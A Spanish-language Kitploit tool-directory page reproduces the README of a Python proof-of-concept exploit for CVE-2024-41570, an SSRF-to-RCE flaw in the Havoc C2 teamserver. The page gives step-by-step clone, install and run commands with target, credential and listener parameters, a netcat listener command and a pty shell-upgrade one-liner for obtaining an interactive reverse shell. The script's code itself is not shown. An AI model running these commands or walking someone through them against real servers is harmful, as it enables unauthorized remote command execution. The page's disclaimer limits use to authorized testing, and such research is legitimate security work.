Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-41570 — Exploit automatizado de reverse shell vía WebSocket | Havoc-C2-SSRF con RCE | Kitploit
Herramientas/GitHubGitHub/diemoeve/cve-2024-41570
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed TeamingHerramienta de Acceso Remoto
GitHubdiemoeve/cve-2024-41570

CVE-2024-41570

Exploit automatizado de reverse shell vía WebSocket | Havoc-C2-SSRF con RCE

Ver Repositorio
122hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-41570 | Havoc C2 SSRF con RCE | Exploit automatizado de shell inversa vía WebSocket

Este proyecto proporciona un script de prueba de concepto (PoC) basado en Python para explotar un servicio vulnerable basado en WebSocket. El script automatiza el registro de agentes, la entrega de payloads WebSocket y la ejecución remota de comandos para establecer una shell inversa.

Características

  • Registra un agente en el servicio objetivo.
  • Abre un WebSocket y envía payloads de handshake y autenticación.
  • Ejecuta comandos de forma remota mediante una shell inversa.
  • Proporciona un flujo de trabajo guiado con instrucciones claras.

Requisitos previos

  • Python 3.x instalado en tu máquina.
  • Instala las dependencias necesarias ejecutando:
    root@kitploit:~
    pip install -r requirements.txt
    

Instalación

  1. Clona este repositorio:
    root@kitploit:~
    git clone https://github.com/kit4py/CVE-2024-41570.git
    
  2. Navega al directorio del proyecto:
    root@kitploit:~
    cd CVE-2024-41570
    
  3. Instala las dependencias:
    root@kitploit:~
    pip install -r requirements.txt
    

Uso

Ejecuta el script con los argumentos requeridos:

root@kitploit:~
python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>

Argumentos

  • -t: URL objetivo del servidor WebSocket.
  • -i: Dirección IP del Team Server de Havoc.
  • -p: Puerto del Team Server de Havoc.
  • -U: Nombre de usuario para la autenticación WebSocket.
  • -P: Contraseña para la autenticación WebSocket.
  • -l: IP del listener para la shell inversa (tu máquina).
  • -L: Puerto del listener para la shell inversa (tu máquina).

Ejemplo de comando

root@kitploit:~
python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444

Pasos para ejecutar

  1. Asegúrate de que el servicio objetivo esté en ejecución y sea vulnerable.
  2. Ejecuta el script con los parámetros requeridos.
  3. En una terminal separada, inicia un listener:
    root@kitploit:~
    nc -lvnp <listener_port>
    
  4. Mejora la shell:
    root@kitploit:~
    python -c 'import pty; pty.spawn("/bin/bash")' 
    export TERM=xterm-256color
    stty rows 67 columns 318
    

Dependencias

El script requiere las siguientes librerías de Python:

  • requests
  • pycryptodome

Instálalas usando el comando:

root@kitploit:~
pip install -r requirements.txt

Aviso de seguridad

Este script está destinado únicamente a fines educativos. Asegúrate de tener autorización explícita para probar el sistema objetivo. El uso indebido de este script puede violar leyes y pautas éticas.

Referencias

Inspirado por Default Havoc Poc

Contribuciones

¡Las contribuciones son bienvenidas! No dudes en hacer un fork del repositorio y enviar un pull request.

Licencia

Este proyecto está licenciado bajo la Licencia MIT. Consulta el archivo LICENSE para más detalles.

Descargar herramienta